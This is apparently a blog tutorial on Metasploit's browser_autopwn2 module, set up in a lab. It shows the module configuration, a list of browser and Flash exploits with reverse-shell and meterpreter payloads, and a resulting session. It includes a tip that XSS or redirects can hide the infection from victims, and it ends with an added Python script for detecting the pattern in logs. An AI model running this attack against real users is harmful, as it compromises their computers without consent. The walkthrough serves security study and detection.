8/07/2017

[MAD-METASPLOIT] 0x21 - Browser attack





Browser attack using Autopwn


autopwn is a module that checks for and runs multiple exploits against web and mobile browsers.


HAHWUL exploit(handler) > search autopwn

Matching Modules
================

   Name                               Disclosure Date  Rank    Description
   ----                               ---------------  ----    -----------
   auxiliary/server/browser_autopwn                    normal  HTTP Client Automatic Exploiter
   auxiliary/server/browser_autopwn2  2015-07-05       normal  HTTP Client Automatic Exploiter 2 (Browser Autopwn)


There is no big difference between the original autopwn and autopwn2, but the newer one is probably the better choice.

HAHWUL exploit(handler) > use auxiliary/server/browser_autopwn2 
HAHWUL auxiliary(browser_autopwn2) > show options

Module options (auxiliary/server/browser_autopwn2):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   EXCLUDE_PATTERN                   no        Pattern search to exclude specific modules
   INCLUDE_PATTERN                   no        Pattern search to include specific modules
   Retries          true             no        Allow the browser to retry the module
   SRVHOST          0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT          8080             yes       The local port to listen on.
   SSL              false            no        Negotiate SSL for incoming connections
   SSLCert                           no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                           no        The URI to use for this exploit (default is random)


Auxiliary action:

   Name       Description
   ----       -----------
   WebServer  Start a bunch of modules and direct clients to appropriate exploits

URIPATH is the path the module is served from; if it is not set, a random one is generated.

HAHWUL auxiliary(browser_autopwn2) > set URIPATH /
URIPATH => /
HAHWUL auxiliary(browser_autopwn2) > set SRVPORT 4242
SRVPORT => 4242
HAHWUL auxiliary(browser_autopwn2) > set SRVHOST  192.168.56.101
SRVHOST =>  192.168.56.101
HAHWUL auxiliary(browser_autopwn2) > exploit

HAHWUL auxiliary(browser_autopwn2) > 
[*] Starting exploit modules...
[*] Starting listeners...
[*] Time spent: 21.340055737
[-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444).
[*] Using URL: http:// 192.168.56.101:4242/

[*] The following is a list of exploits that BrowserAutoPwn will consider using.
[*] Exploits with the highest ranking and newest will be tried first.

Exploits
========

 Order  Rank       Name                                       Payload
 -----  ----       ----                                       -------
 1      Excellent  firefox_webidl_injection                   firefox/shell_reverse_tcp on 4442
 2      Excellent  firefox_tostring_console_injection         firefox/shell_reverse_tcp on 4442
 3      Excellent  firefox_svg_plugin                         firefox/shell_reverse_tcp on 4442
 4      Excellent  firefox_proto_crmfrequest                  firefox/shell_reverse_tcp on 4442
 5      Excellent  webview_addjavascriptinterface             android/meterpreter/reverse_tcp on 4443
 6      Excellent  samsung_knox_smdm_url                      android/meterpreter/reverse_tcp on 4443
 7      Great      adobe_flash_worker_byte_array_uaf          windows/meterpreter/reverse_tcp on 4444
 8      Great      adobe_flash_domain_memory_uaf              windows/meterpreter/reverse_tcp on 4444
 9      Great      adobe_flash_copy_pixels_to_byte_array      windows/meterpreter/reverse_tcp on 4444
 10     Great      adobe_flash_casi32_int_overflow            windows/meterpreter/reverse_tcp on 4444
 11     Great      adobe_flash_uncompress_zlib_uaf            windows/meterpreter/reverse_tcp on 4444
 12     Great      adobe_flash_shader_job_overflow            windows/meterpreter/reverse_tcp on 4444
 13     Great      adobe_flash_shader_drawing_fill            windows/meterpreter/reverse_tcp on 4444
 14     Great      adobe_flash_pixel_bender_bof               windows/meterpreter/reverse_tcp on 4444
 15     Great      adobe_flash_opaque_background_uaf          windows/meterpreter/reverse_tcp on 4444
 16     Great      adobe_flash_net_connection_confusion       windows/meterpreter/reverse_tcp on 4444
 17     Great      adobe_flash_nellymoser_bof                 windows/meterpreter/reverse_tcp on 4444
 18     Great      adobe_flash_hacking_team_uaf               windows/meterpreter/reverse_tcp on 4444
 19     Good       wellintech_kingscada_kxclientdownload      windows/meterpreter/reverse_tcp on 4444
 20     Good       ms14_064_ole_code_execution                windows/meterpreter/reverse_tcp on 4444
 21     Good       adobe_flash_uncompress_zlib_uninitialized  windows/meterpreter/reverse_tcp on 4444

[+] Please use the following URL for the browser attack:
[+] BrowserAutoPwn URL: http:// 192.168.56.101:4242/
[*] Server started.

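When an ordinary user opens http://192.168.56.101:4242 in a web browser, the module loads the exploit code that matches that browser and infects the user.
Of course, this process is conspicuous, so in practice XSS or URL redirection is used to infect the user at a moment when they are unlikely to notice.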

HAHWUL auxiliary(browser_autopwn2) > 
[*] Gathering target information for  192.168.56.101
[*] Sending HTML response to  192.168.56.101
[*]  192.168.56.101     wellintech_kingscada_kxclientdownload - Requested: /HVzrMiilwJj/eNwxdK/
[*]  192.168.56.101     wellintech_kingscada_kxclientdownload - Sending KingScada kxClientDownload.ocx ActiveX Remote Code Execution
...snip...

HAHWUL auxiliary(browser_autopwn2) > sessions -l

Active sessions
===============

  Id  Type                     Information                         Connection
  --  ----                     -----------                         ----------
  1   meterpreter x86/windows  HAHWUL\Test-Virtualbox @ HAHWUL   192.168.56.101:4242 ->  192.168.56.101:38258 (192.168.56.101)
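
On the defending side, the sequence visible in the output above (landing page, then a request for a random-looking path such as /HVzrMiilwJj/eNwxdK/, then a payload connection) can be correlated across proxy and flow logs. The following is an added example, not part of the original post: the log records, client addresses, 60-second window and path heuristic are constructed assumptions, and it assumes the payload listener runs on the same host as the web server, as in this lab setup.

```python
import re
from collections import defaultdict

# Constructed sample records (not from the original post): HTTP proxy entries
# (ts, client, server, port, path) and flow entries (ts, src, dst, dport).
HTTP_LOG = [
    (100, "10.0.0.23", "192.168.56.101", 4242, "/"),
    (101, "10.0.0.23", "192.168.56.101", 4242, "/HVzrMiilwJj/eNwxdK/"),
    (102, "10.0.0.40", "192.168.56.101", 4242, "/"),
    (150, "10.0.0.51", "10.0.0.8", 8080, "/static/js/app.js"),
]
FLOW_LOG = [
    (104, "10.0.0.23", "192.168.56.101", 4444),
    (155, "10.0.0.51", "10.0.0.8", 5432),
]

WEB_PORTS = {80, 443}
# Heuristic (assumption): alphanumeric segment with a lower->upper transition,
# like the "/HVzrMiilwJj/eNwxdK/" request in the module output. camelCase
# application paths also match, so this is never used alone, only correlated.
RANDOM_SEG = re.compile(r"^(?=.*[a-z][A-Z])[A-Za-z0-9]{5,}$")

def random_looking(path):
    segs = [s for s in path.split("/") if s]
    return bool(segs) and all(RANDOM_SEG.match(s) for s in segs)

def correlate(http_log, flow_log, window=60):
    """Alert on clients that fetched a random-looking path from an HTTP server
    on a non-web port and then connected to the same server on a different
    port within `window` seconds."""
    hits = defaultdict(list)  # (client, server) -> [(ts, port, path)]
    for ts, client, server, port, path in http_log:
        if port not in WEB_PORTS and random_looking(path):
            hits[(client, server)].append((ts, port, path))
    alerts = []
    for ts, src, dst, dport in sorted(flow_log):
        for h_ts, h_port, path in hits.get((src, dst), []):
            if dport != h_port and 0 <= ts - h_ts <= window:
                alerts.append({"client": src, "server": dst,
                               "http_port": h_port, "path": path,
                               "callback_port": dport, "delay": ts - h_ts})
    return alerts

if __name__ == "__main__":
    for alert in correlate(HTTP_LOG, FLOW_LOG):
        print(alert)
```

The payload ports in the exploit table (4442, 4443, 4444) are listener settings in this run, so the correlation keys on "same server, different port" rather than on fixed port numbers.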





HAHWUL

Security engineer, Gopher and H4cker!
